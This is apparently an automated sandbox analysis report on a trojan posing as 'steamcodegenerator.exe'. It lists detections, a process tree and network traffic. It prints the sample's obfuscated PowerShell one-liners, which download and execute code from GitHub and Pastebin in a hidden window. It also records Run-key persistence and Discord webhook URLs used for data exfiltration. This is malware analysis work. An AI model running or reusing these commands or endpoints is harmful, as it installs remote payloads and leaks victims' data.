Windows Analysis Report
steamcodegenerator.exe

Overview

General Information

Sample name: steamcodegenerator.exe
Analysis ID: 1534102
MD5: d4f1751389516a3dfac98551142cb153
SHA1: f362178e1ecd3eac536b666e89c2aa5663109116
SHA256: eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • steamcodegenerator.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\steamcodegenerator.exe" MD5: D4F1751389516A3DFAC98551142CB153)
    • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7628 cmdline: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8168 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 7268 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4080 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 5236 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6016 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: sslproxydump.pcap | Rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x902e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt | Rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x16c5f:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: amsi64_5660.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Source: amsi64_7248.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 7500, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 7628, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7744, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 7500, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 7628, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T16:00:08.497087+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 162.159.138.232 | 443 | TCP
2024-10-15T16:00:16.360221+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 162.159.138.232 | 443 | TCP
2024-10-15T15:59:53.331844+0200 | 2857658 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 162.159.138.232 | 443 | TCP

AV Detection

Source: steamcodegenerator.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: steamcodegenerator.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& | source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb | source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb | source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb | source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663560478 FindFirstFileExW,0_2_00007FF663560478

Networking

Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.4:49749 -> 162.159.138.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.4:49763 -> 162.159.138.232:443
Source: Network traffic | Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.4:49742 -> 162.159.138.232:443
Source: unknown | DNS query: name: pastebin.com
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | IP Address: 162.159.138.232
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 213 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 298 | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /user-attachments/files/17267811/stm.txt HTTP/1.1 | User-Agent: Downloader | Host: github.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135927Z&X-Amz-Expires=300&X-Amz-Signature=8a42f0840dba3c62020dad0419913b6620b38691d3ca1b89b59ca471c19fa727&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1 | User-Agent: Downloader | Cache-Control: no-cache | Host: objects.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 13:59:53 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000794 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWnV7TPvkg5LZKvrTXlOvT%2BEdxRSZVjQR2VHBvQhjXYCguoQolUzOZJtES0lyG%2BnICdJwdZcwfOQEn97tnR8NAh1SKuQGHTtgI%2FOJJHa3khkNkjOBTA3SH4bdh29"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=b96900f5ee5ff634769fa70e31a8093c5cc2c686-1729000793; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=B9oNm1iH5MaqkqTXcdybFvpTlS5n6AwSsI_dOXK08Wk-1729000793263-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30550d4c198d2d-DFW
Source: powershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF305C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF308D000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt$
Source: steamcodegenerator.exe | String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt%pinvalid
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txta
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF305C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtll
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtnp
Source: powershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubusercontent.com/
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-
Source: powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX

System Summary

Source: amsi64_5660.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7248.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000022AF4E1819F NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect, | 0_2_0000022AF4E1819F
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663542230 | 0_2_00007FF663542230
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663560478 | 0_2_00007FF663560478
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663557C3C | 0_2_00007FF663557C3C
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663564B84 | 0_2_00007FF663564B84
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663564C0B | 0_2_00007FF663564C0B
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663550414 | 0_2_00007FF663550414
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663556974 | 0_2_00007FF663556974
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663550210 | 0_2_00007FF663550210
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF6635521E8 | 0_2_00007FF6635521E8
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66355408C | 0_2_00007FF66355408C
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66356203C | 0_2_00007FF66356203C
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF6635590FC | 0_2_00007FF6635590FC
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663554910 | 0_2_00007FF663554910
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66355980A | 0_2_00007FF66355980A
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66355000C | 0_2_00007FF66355000C
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66355F008 | 0_2_00007FF66355F008
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663550FD4 | 0_2_00007FF663550FD4
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66356354C | 0_2_00007FF66356354C
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663542DE0 | 0_2_00007FF663542DE0
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000022AF4E1819F | 0_2_0000022AF4E1819F
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000022AF4E16AB7 | 0_2_0000022AF4E16AB7
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000022AF4E18C53 | 0_2_0000022AF4E18C53
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000022AF4E17D6F | 0_2_0000022AF4E17D6F
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000022AF4E51F00 | 0_2_0000022AF4E51F00
Source: amsi64_5660.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7248.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
